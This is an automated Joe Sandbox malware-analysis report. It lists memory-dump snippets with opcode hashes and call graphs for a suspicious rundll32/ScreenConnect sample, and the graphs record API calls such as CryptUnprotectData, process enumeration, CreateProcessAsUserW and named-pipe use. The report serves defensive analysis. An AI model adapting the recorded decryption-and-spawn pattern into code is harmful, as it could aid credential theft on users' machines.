                                                                                            • Instruction Fuzzy Hash: C6018F317002049BDB18EB69C4587AF7AE69FC8250F64806DD606B7381CF755D458BE1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000003.1365279781.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_3_51f0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0204ec120f561b0bbc333563a5d4d761d3051d39a23a13bd6410ec70a6da7a9c
                                                                                            • Instruction ID: 04032cbe51bd52bdf478976a4fa29a19d0ebc0e9b249bf3b556a19744a72d675
                                                                                            • Opcode Fuzzy Hash: 0204ec120f561b0bbc333563a5d4d761d3051d39a23a13bd6410ec70a6da7a9c
                                                                                            • Instruction Fuzzy Hash: 1101A231B40215A7EB18AA68DA597AF7AF7AB88710F54402DD602B3382CF795D01C7A1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000003.1365279781.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_3_51f0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0d708d098b75b1a8e7b93e4151c69648cad6fdd941b05d83d88b7b356d9eb357
                                                                                            • Instruction ID: 4a2b9cd9aa84866db1379b9fe782b420e50330c11324dcf9b2a1b6866865d784
                                                                                            • Opcode Fuzzy Hash: 0d708d098b75b1a8e7b93e4151c69648cad6fdd941b05d83d88b7b356d9eb357
                                                                                            • Instruction Fuzzy Hash: F801F930719345AFE7195F74A8B63267FA6EFC262070609AAC345CF191EB208854CB95
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000003.1365279781.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_3_51f0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e8b19044775712d87c251cd18377c66738965b1b1aa10660c845e201602f3ce9
                                                                                            • Instruction ID: ff6b70dee2cd0242778a39532a2f6adf7e2868c092c196e2403018054a93d5b7
                                                                                            • Opcode Fuzzy Hash: e8b19044775712d87c251cd18377c66738965b1b1aa10660c845e201602f3ce9
                                                                                            • Instruction Fuzzy Hash: F1F0E23674121073D7241516D888B6BAA5EABD8268F040139EF0997301EB28C911C3A0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000003.1365279781.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_3_51f0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b4416e9c4a77a840a1c78a513dd3c29c7c297309b62207fa59d0e9267845cd2e
                                                                                            • Instruction ID: c8d313163ca8e81b5fe29c525bca49c00611bcf92c2aeadf2010f88297ccc867
                                                                                            • Opcode Fuzzy Hash: b4416e9c4a77a840a1c78a513dd3c29c7c297309b62207fa59d0e9267845cd2e
                                                                                            • Instruction Fuzzy Hash: 28F08231710201579325965EE89499BB7EBEFC4660744852AE6098B340DFB5EC094BF0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000003.1365279781.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_3_51f0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cf78958d3236397296d5e8a51cec9e03d5e5279b9fa207a2994ff6c97819ee51
                                                                                            • Instruction ID: f1fbee21fed0d45dc21eaceeac42f94e607032dd0caa025227df75a356d5946f
                                                                                            • Opcode Fuzzy Hash: cf78958d3236397296d5e8a51cec9e03d5e5279b9fa207a2994ff6c97819ee51
                                                                                            • Instruction Fuzzy Hash: D4F0F071710305ABEB199B78E8A632A7FDBBBC1720B05092997069E280FF208950CBC5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000003.1365279781.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_3_51f0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d302c0f116929a6ce1fcd8000635abc04aeb03b3188fe8755677c4b7844ac2d4
                                                                                            • Instruction ID: f7dfa84f038abd5a951394cb656b56a17b36b6e46c212157ccf4664f312a3326
                                                                                            • Opcode Fuzzy Hash: d302c0f116929a6ce1fcd8000635abc04aeb03b3188fe8755677c4b7844ac2d4
                                                                                            • Instruction Fuzzy Hash: BDF05C327043400FD3028A39D82468377668FC9314F1544BAD108D7252C934580AC750
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000003.1365279781.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_3_51f0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4e0a5f6cf9206bba956b209895e52e6b7e76483c967ad91f3da87017cec7077f
                                                                                            • Instruction ID: 50794044fb5ffb29d58e6232ade79847f8abfb9e0cd1546caf559b45070bc3fe
                                                                                            • Opcode Fuzzy Hash: 4e0a5f6cf9206bba956b209895e52e6b7e76483c967ad91f3da87017cec7077f
                                                                                            • Instruction Fuzzy Hash: 9BE09B3573061527FF2815A4DC507B626CE5B51714F10007AEA15C7B83D7F8D84513E2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000003.1365279781.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_3_51f0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f9b81ff88ee1ab6e3dc2d6aad78b80db1b436603a6124406ce9d740d3a73f3a6
                                                                                            • Instruction ID: ce8cdd76798a5dfaf5bc3cec781e01b56a0310fc5e5d4af90193a74d05853e4e
                                                                                            • Opcode Fuzzy Hash: f9b81ff88ee1ab6e3dc2d6aad78b80db1b436603a6124406ce9d740d3a73f3a6
                                                                                            • Instruction Fuzzy Hash: 08E026327002044BD3049A2AE864957B7AFDBCD724F20407AE60CC7345CE72AC0AC6D0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000003.1365279781.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_3_51f0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b466c391ccdedb72281fd4e9d0688e6148a9301629d0633573686724066c0844
                                                                                            • Instruction ID: 24a19caef709ee8bb0995fa1155abeb393828d266a78a64ab314396599e39ffc
                                                                                            • Opcode Fuzzy Hash: b466c391ccdedb72281fd4e9d0688e6148a9301629d0633573686724066c0844
                                                                                            • Instruction Fuzzy Hash: 99E0D8719012089FCB01CB74D62828D7BB1DF01104B064596C405E3141EA306F058750
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000003.1365279781.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_3_51f0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5e521169466882f52274d49f948989f4c11ae10ef6a0b29e3ee129d7e124f5e8
                                                                                            • Instruction ID: 339d2068470aa071d78defed5a4c8e5b877a4855070c0c2ed32a330a380cb498
                                                                                            • Opcode Fuzzy Hash: 5e521169466882f52274d49f948989f4c11ae10ef6a0b29e3ee129d7e124f5e8
                                                                                            • Instruction Fuzzy Hash: 56E08C71A1220CEBDB10DFA4F95A76DBBB9EF40214F0041A9E808D3280EB316E089B85
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000003.1365279781.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_3_51f0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8c2bd3474f16d566b0991cc2cc1aeadb7bb43015c63783096b7d432859f5f363
                                                                                            • Instruction ID: 314483ca42b64315950d08231c7f7034ef8b7ff1c9d1fe4de59cc479201c8ad9
                                                                                            • Opcode Fuzzy Hash: 8c2bd3474f16d566b0991cc2cc1aeadb7bb43015c63783096b7d432859f5f363
                                                                                            • Instruction Fuzzy Hash: F2D0A73231011CAB4604A658D99996A77ABE7982707604423FB0793214CE615C148BDA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000003.1365279781.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_3_51f0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f2faa1a7e33cac805925dea7675d5077f3a9a3b4d4da638f547eaba46f46c31a
                                                                                            • Instruction ID: 297eb9bea81dea32cc54bd1fe669f5be64f4020502bcb89ee74406aa4516f79d
                                                                                            • Opcode Fuzzy Hash: f2faa1a7e33cac805925dea7675d5077f3a9a3b4d4da638f547eaba46f46c31a
                                                                                            • Instruction Fuzzy Hash: 1FD0A73AE2032477D70037B4A9853A6B79EDB48161F128166EE19DA207DF798C1003C0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000003.1365279781.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_3_51f0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c3fc8c8c8bab69b2c4ca85b3c0649dac1ffc2d30c8035ff38b890ba224ce6177
                                                                                            • Instruction ID: bf4f899f69355e94a81d173f508290ab6bb4e56c30fb8030419ddc024da91280
                                                                                            • Opcode Fuzzy Hash: c3fc8c8c8bab69b2c4ca85b3c0649dac1ffc2d30c8035ff38b890ba224ce6177
                                                                                            • Instruction Fuzzy Hash: 0BD0A73B3050544FE3065750E5697E53F7B935C231F5C4067EA9247765CA3A4925C7D0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000003.1365279781.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_3_51f0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8396b73b9ae1f281130f08539ed6101798fd4191bc3a2fd2b8bd3ca1919957ca
                                                                                            • Instruction ID: 70058f69d316ac4b9259fa3ffd19d624d187abc6402dc04756bd51d72a91f314
                                                                                            • Opcode Fuzzy Hash: 8396b73b9ae1f281130f08539ed6101798fd4191bc3a2fd2b8bd3ca1919957ca
                                                                                            • Instruction Fuzzy Hash: 87D0A7303C070CBBF7102160E81D77632E96740725F500014EB0D091C1DBA45494C390
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000003.1365279781.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_3_51f0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 80bdc7a9f7480ab54f2fc03c47d9338136ebf683792767519c5620bd113eebc0
                                                                                            • Instruction ID: 01766b441ca9eb7db591df05dd03bf917bd8333be84938314074b3a55ad5887f
                                                                                            • Opcode Fuzzy Hash: 80bdc7a9f7480ab54f2fc03c47d9338136ebf683792767519c5620bd113eebc0
                                                                                            • Instruction Fuzzy Hash: 42C02233B8F638338A0112AC9D0128673084B06920F020C92CA08D2203C20A9C4083E2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000003.1365279781.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_3_51f0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 07dca0577c0a1c07c9c7ebda4eb3a2d2449b6d980d9b0f3267fa9e8df46234c1
                                                                                            • Instruction ID: 8127e8cb0bccee521774691579ab85e908f540fee8ecd8a2f61edf20b3cd3279
                                                                                            • Opcode Fuzzy Hash: 07dca0577c0a1c07c9c7ebda4eb3a2d2449b6d980d9b0f3267fa9e8df46234c1
                                                                                            • Instruction Fuzzy Hash: F3D05E70A1220CEFDB10DFA4E95659DBBF9EF44214B1045A9E808D3240EA716F089F95
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000003.1365279781.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_3_51f0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 214baeac1df13af9ced8ea70fd8f000ac043bf963567b0cf26fe7cbc5f1d94b0
                                                                                            • Instruction ID: c87140e732503fd674b01327379039b3e5de2a5466ad773d22c488a9a46aab9e
                                                                                            • Opcode Fuzzy Hash: 214baeac1df13af9ced8ea70fd8f000ac043bf963567b0cf26fe7cbc5f1d94b0
                                                                                            • Instruction Fuzzy Hash: E6D01771A1120CEF9B00DFA8E95569DB7F9EB44214B5045A9D809E3200EE316E049BA1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000003.1365279781.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_3_51f0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 119a5f5080d1234536ac3e6a6c49c335294b10c68f1f7d8780335bbf53a90690
                                                                                            • Instruction ID: 8c0b5935a15189a65f50f937052924460feef5ca9e10adc3a88580998e98acbd
                                                                                            • Opcode Fuzzy Hash: 119a5f5080d1234536ac3e6a6c49c335294b10c68f1f7d8780335bbf53a90690
                                                                                            • Instruction Fuzzy Hash: 09C0803179130CFFD5143665966D335364F5740514F410C04750F85001CF59D4504745
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000003.1365279781.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_3_51f0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 49b05750ee0c2985a74189a56517bf58ffd72b54b610c9730149bf595027a2d5
                                                                                            • Instruction ID: 907094054998a6576d1d2206266365a8079bd2633ea62f1cf4af4369663c4b20
                                                                                            • Opcode Fuzzy Hash: 49b05750ee0c2985a74189a56517bf58ffd72b54b610c9730149bf595027a2d5
                                                                                            • Instruction Fuzzy Hash: 5BC04C32464100AFDA114A40C9C67957B62E764315F954A28A480A4191C73E55719A14
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000003.1365279781.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_3_51f0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1deeff200cfa58edd5884dee12c4f9b2beec2d3c9017a4c79500df5bb29222be
                                                                                            • Instruction ID: c48d697871504246b26b12b983316e252c587253f532d02b7e995aa2a4f8f9a3
                                                                                            • Opcode Fuzzy Hash: 1deeff200cfa58edd5884dee12c4f9b2beec2d3c9017a4c79500df5bb29222be
                                                                                            • Instruction Fuzzy Hash: 7BC09B307D0308B7F71416A0E81577D7565BBD0705F544421F60DBD1C0DD515C50C350
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000003.1365279781.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_3_51f0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4f0b3201de7033b7728413179f21db489bb9bb8d245aceae37a0a8c891b7c5f9
                                                                                            • Instruction ID: e50a625aa28878f60ba052b03e2b8f77e9410ad812ed6de329be27d14ee35b93
                                                                                            • Opcode Fuzzy Hash: 4f0b3201de7033b7728413179f21db489bb9bb8d245aceae37a0a8c891b7c5f9
                                                                                            • Instruction Fuzzy Hash: DBB01226644109F35108F6358CD85FA02E356C4210FC0CC002503600068F1D80000509

                                                                                            Execution Graph

                                                                                            Execution Coverage:13.3%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:6.4%
                                                                                            Total number of Nodes:125
                                                                                            Total number of Limit Nodes:7
                                                                                            execution_graph 43564 3fb16f8 43565 3fb173a 43564->43565 43566 3fb1740 CryptProtectData 43564->43566 43565->43566 43567 3fb1783 43566->43567 43696 587f5e4 43697 587f009 43696->43697 43700 5710210 43697->43700 43707 5710203 43697->43707 43702 5710258 43700->43702 43701 57103de 43701->43697 43702->43701 43705 5710210 CryptUnprotectData 43702->43705 43706 5710203 CryptUnprotectData 43702->43706 43703 571032e 43703->43701 43714 5710bc1 43703->43714 43705->43703 43706->43703 43709 5710210 43707->43709 43708 57103de 43708->43697 43709->43708 43711 5710210 CryptUnprotectData 43709->43711 43712 5710203 CryptUnprotectData 43709->43712 43710 571032e 43710->43708 43713 5710bc1 CryptUnprotectData 43710->43713 43711->43710 43712->43710 43713->43708 43715 5710b5e CryptUnprotectData 43714->43715 43717 5710bce 43714->43717 43716 5710b8a 43715->43716 43716->43701 43568 5870040 43569 5870071 43568->43569 43577 5870bc2 43569->43577 43570 58700c7 43572 5870207 43570->43572 43583 5871340 43570->43583 43587 5871350 43570->43587 43571 5870a4e 43571->43571 43591 5876050 43572->43591 43578 5870bf4 43577->43578 43580 5870c3c 43578->43580 43599 5715f78 43578->43599 43607 5715f88 43578->43607 43579 5870ccc 43579->43579 43580->43570 43584 5871350 43583->43584 43650 58713b0 43584->43650 43588 587135f 43587->43588 43590 58713b0 2 API calls 43588->43590 43589 5871374 43589->43572 43590->43589 43592 587607e 43591->43592 43594 5876097 43592->43594 43663 58761c0 43592->43663 43670 58761af 43592->43670 43593 58760c0 43597 58761c0 2 API calls 43593->43597 43598 58761af 3 API calls 43593->43598 43594->43571 43597->43594 43598->43594 43601 5715fbc 43599->43601 43602 5715fac 43599->43602 43600 5715fb5 43600->43579 43615 5716108 43601->43615 43622 57160f8 43601->43622 43602->43600 43603 5716108 4 API calls 43602->43603 43604 57160f8 4 API calls 43602->43604 43603->43602 43604->43602 43608 5715fbc 43607->43608 43609 5715fac 43607->43609 43613 5716108 4 API calls 43608->43613 43614 57160f8 4 API calls 43608->43614 43610 5715fb5 43609->43610 43611 5716108 4 API calls 43609->43611 43612 57160f8 4 API calls 43609->43612 43610->43579 43611->43609 43612->43609 43613->43609 43614->43609 43617 571612d 43615->43617 43618 571613d 43615->43618 43616 5716136 43616->43602 43617->43616 43643 5714de0 43617->43643 43629 5716278 43618->43629 43636 5716288 43618->43636 43624 5716108 43622->43624 43623 571612d 43625 5716136 43623->43625 43626 5714de0 ProcessIdToSessionId 43623->43626 43624->43623 43627 5716278 2 API calls 43624->43627 43628 5716288 2 API calls 43624->43628 43625->43602 43626->43623 43627->43623 43628->43623 43631 5716288 43629->43631 43630 57162a8 43630->43617 43635 571629f 43631->43635 43646 5714dec 43631->43646 43632 571641a K32EnumProcesses 43633 5716452 43632->43633 43633->43617 43635->43630 43635->43632 43641 57162b2 43636->43641 43642 571629f 43636->43642 43637 57162a8 43637->43617 43638 571641a K32EnumProcesses 43639 5716452 43638->43639 43639->43617 43640 5714dec K32EnumProcesses 43640->43641 43641->43640 43641->43642 43642->43637 43642->43638 43644 57164c0 ProcessIdToSessionId 43643->43644 43645 5716533 43644->43645 43645->43617 43647 57163c8 K32EnumProcesses 43646->43647 43649 5716452 43647->43649 43649->43631 43651 58713eb 43650->43651 43655 5872760 43651->43655 43659 587275a 43651->43659 43652 58714b9 43656 58727b3 CreateProcessAsUserW 43655->43656 43658 5872844 43656->43658 43658->43652 43660 5872760 CreateProcessAsUserW 43659->43660 43662 5872844 43660->43662 43662->43652 43664 58761cd 43663->43664 43666 5876204 43664->43666 43680 58754ac 43664->43680 43684 5713408 43666->43684 43688 57133c0 43666->43688 43671 5876216 WaitNamedPipeW 43670->43671 43676 58761ba 43670->43676 43674 58762a4 43671->43674 43673 58754ac WaitNamedPipeW 43673->43676 43674->43593 43675 5876204 43678 57133c0 CreateFileA 43675->43678 43679 5713408 CreateFileA 43675->43679 43676->43673 43676->43675 43677 587620f 43677->43593 43678->43677 43679->43677 43681 5876228 WaitNamedPipeW 43680->43681 43683 58762a4 43681->43683 43683->43664 43685 571341b 43684->43685 43692 57124dc 43685->43692 43689 5713408 43688->43689 43690 57124dc CreateFileA 43689->43690 43691 5713440 43690->43691 43691->43593 43693 5713458 CreateFileA 43692->43693 43695 571358d 43693->43695 43718 5872ab0 43721 5871924 43718->43721 43722 5871929 ConnectNamedPipe 43721->43722 43724 5873e88 43722->43724

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 296 5872760-58727b1 297 58727b3-58727b9 296->297 298 58727bc-58727c0 296->298 297->298 299 58727c2-58727c5 298->299 300 58727c8-58727dd 298->300 299->300 301 58727df-58727e8 300->301 302 58727eb-5872842 CreateProcessAsUserW 300->302 301->302 303 5872844-587284a 302->303 304 587284b-5872873 302->304 303->304
                                                                                            APIs
                                                                                            • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 0587282F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2613770119.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5870000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateProcessUser
                                                                                            • String ID:
                                                                                            • API String ID: 2217836671-0
                                                                                            • Opcode ID: be0fec0c14a342d1928d72fa51b2b4065fab18f3485d40bf95fa2300bfc4f4ba
                                                                                            • Instruction ID: aaf840e63d19dfc9d0422746a04f15c4ddfdb19f618e85e9973c179bfe0cebdf
                                                                                            • Opcode Fuzzy Hash: be0fec0c14a342d1928d72fa51b2b4065fab18f3485d40bf95fa2300bfc4f4ba
                                                                                            • Instruction Fuzzy Hash: 61413376900209DFCF11CFA9C884ADEBBF5FF48310F15842AE919A7250D375AA55CFA0

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 415 5710bc1-5710bcc 416 5710b5e-5710b88 CryptUnprotectData 415->416 417 5710bce-5710c03 415->417 418 5710b91-5710bb9 416->418 419 5710b8a-5710b90 416->419 423 5710c0a-5710c26 417->423 419->418 425 5710c31 423->425 426 5710c28 423->426 426->425
                                                                                            APIs
                                                                                            • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 05710B75
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2613404981.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5710000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID: CryptDataUnprotect
                                                                                            • String ID:
                                                                                            • API String ID: 834300711-0
                                                                                            • Opcode ID: 2dae9c93dc48cd7830a7990589df1ea35ad27e8ef7a06d8fd7435b1cb65f433d
                                                                                            • Instruction ID: 3967e58255684dfd074af14a019bac9ab236e4e6c202a26b0c06d834a5006705
                                                                                            • Opcode Fuzzy Hash: 2dae9c93dc48cd7830a7990589df1ea35ad27e8ef7a06d8fd7435b1cb65f433d
                                                                                            • Instruction Fuzzy Hash: 5621C2329042488FDF14DF68D8087EEBBF2FB88304F24846ED905A7241CB799985DBA4
                                                                                            APIs
                                                                                            • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 03FB176E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2606955103.0000000003FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FB0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_3fb0000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID: CryptDataProtect
                                                                                            • String ID:
                                                                                            • API String ID: 3091777813-0
                                                                                            • Opcode ID: 65c77cbf27c3c1776157adee7d1d9267e161789d08ed5276b09ce584bdcb1983
                                                                                            • Instruction ID: e89cbccc38fdd043376db46aa9de3c7c5fd58b83f415332762a450fbf7ba79cf
                                                                                            • Opcode Fuzzy Hash: 65c77cbf27c3c1776157adee7d1d9267e161789d08ed5276b09ce584bdcb1983
                                                                                            • Instruction Fuzzy Hash: C02128B6C002499FDF11CF9AC844ADEBBB1FF88310F158529E919A7210C375A555CFA5
                                                                                            APIs
                                                                                            • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 03FB176E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2606955103.0000000003FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FB0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_3fb0000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID: CryptDataProtect
                                                                                            • String ID:
                                                                                            • API String ID: 3091777813-0
                                                                                            • Opcode ID: c1d0610890e246ce595996d6f4ca4435ef66b063be0425f45d3824ae651ec431
                                                                                            • Instruction ID: 068f2897c533a3d8c7e1b6976d7f332d80eed70297af6013120b3a4191c7b9a1
                                                                                            • Opcode Fuzzy Hash: c1d0610890e246ce595996d6f4ca4435ef66b063be0425f45d3824ae651ec431
                                                                                            • Instruction Fuzzy Hash: 822104B680024A9FDF10CF9AC844ADEBBF5FB88310F15852AE918A7250C379A555CFA5
                                                                                            APIs
                                                                                            • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 05710B75
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2613404981.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5710000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID: CryptDataUnprotect
                                                                                            • String ID:
                                                                                            • API String ID: 834300711-0
                                                                                            • Opcode ID: d0cb5d1309a03232ccce038e18ff0a2fe60b62e2db6e70f50b1c469624284354
                                                                                            • Instruction ID: b6e9957c9a796aeaa4013e45c7a5b907fab2cac6007565da2b3a48504386cd61
                                                                                            • Opcode Fuzzy Hash: d0cb5d1309a03232ccce038e18ff0a2fe60b62e2db6e70f50b1c469624284354
                                                                                            • Instruction Fuzzy Hash: 702144B2800249DFDF20CF99C845BEEBBF4FB48324F148429E918A7250C379A651DFA5
                                                                                            APIs
                                                                                            • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 05710B75
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2613404981.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5710000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID: CryptDataUnprotect
                                                                                            • String ID:
                                                                                            • API String ID: 834300711-0
                                                                                            • Opcode ID: 05196da4f03f17fe97d7f81c8b1a1d41cd8b109a190ea685826d949dac0da633
